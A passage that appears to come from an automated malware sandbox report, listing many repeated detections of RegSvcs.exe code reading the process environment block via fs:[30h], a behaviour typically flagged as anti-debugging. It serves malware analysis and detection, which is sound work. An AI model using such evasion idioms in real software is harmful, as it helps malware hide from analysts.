Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AF0BF mov ecx, dword ptr fs:[00000030h] 4_2_012AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AF0BF mov eax, dword ptr fs:[00000030h] 4_2_012AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AF0BF mov eax, dword ptr fs:[00000030h] 4_2_012AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279080 mov eax, dword ptr fs:[00000030h] 4_2_01279080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F3884 mov eax, dword ptr fs:[00000030h] 4_2_012F3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F3884 mov eax, dword ptr fs:[00000030h] 4_2_012F3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h] 4_2_012740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h] 4_2_012740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h] 4_2_012740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012758EC mov eax, dword ptr fs:[00000030h] 4_2_012758EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129B8E4 mov eax, dword ptr fs:[00000030h] 4_2_0129B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129B8E4 mov eax, dword ptr fs:[00000030h] 4_2_0129B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov ecx, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0130B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133131B mov eax, dword ptr fs:[00000030h] 4_2_0133131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127DB60 mov ecx, dword ptr fs:[00000030h] 4_2_0127DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A3B7A mov eax, dword ptr fs:[00000030h] 4_2_012A3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A3B7A mov eax, dword ptr fs:[00000030h] 4_2_012A3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127DB40 mov eax, dword ptr fs:[00000030h] 4_2_0127DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01348B58 mov eax, dword ptr fs:[00000030h] 4_2_01348B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127F358 mov eax, dword ptr fs:[00000030h] 4_2_0127F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h] 4_2_012A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h] 4_2_012A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h] 4_2_012A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01345BA5 mov eax, dword ptr fs:[00000030h] 4_2_01345BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01281B8F mov eax, dword ptr fs:[00000030h] 4_2_01281B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01281B8F mov eax, dword ptr fs:[00000030h] 4_2_01281B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132D380 mov ecx, dword ptr fs:[00000030h] 4_2_0132D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133138A mov eax, dword ptr fs:[00000030h] 4_2_0133138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AB390 mov eax, dword ptr fs:[00000030h] 4_2_012AB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A2397 mov eax, dword ptr fs:[00000030h] 4_2_012A2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129DBE9 mov eax, dword ptr fs:[00000030h] 4_2_0129DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h] 4_2_012A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F53CA mov eax, dword ptr fs:[00000030h] 4_2_012F53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F53CA mov eax, dword ptr fs:[00000030h] 4_2_012F53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h] 4_2_0129A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B4A2C mov eax, dword ptr fs:[00000030h] 4_2_012B4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B4A2C mov eax, dword ptr fs:[00000030h] 4_2_012B4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01288A0A mov eax, dword ptr fs:[00000030h] 4_2_01288A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133AA16 mov eax, dword ptr fs:[00000030h] 4_2_0133AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127AA16 mov eax, dword ptr fs:[00000030h] 4_2_0127AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01293A1C mov eax, dword ptr fs:[00000030h] 4_2_01293A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01275210 mov eax, dword ptr fs:[00000030h] 4_2_01275210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01275210 mov ecx, dword ptr fs:[00000030h] 4_2_01275210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B927A mov eax, dword ptr fs:[00000030h] 4_2_012B927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132B260 mov eax, dword ptr fs:[00000030h] 4_2_0132B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01348A62 mov eax, dword ptr fs:[00000030h] 4_2_01348A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133EA55 mov eax, dword ptr fs:[00000030h] 4_2_0133EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279240 mov eax, dword ptr fs:[00000030h] 4_2_01279240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01304257 mov eax, dword ptr fs:[00000030h] 4_2_01304257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h] 4_2_012752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]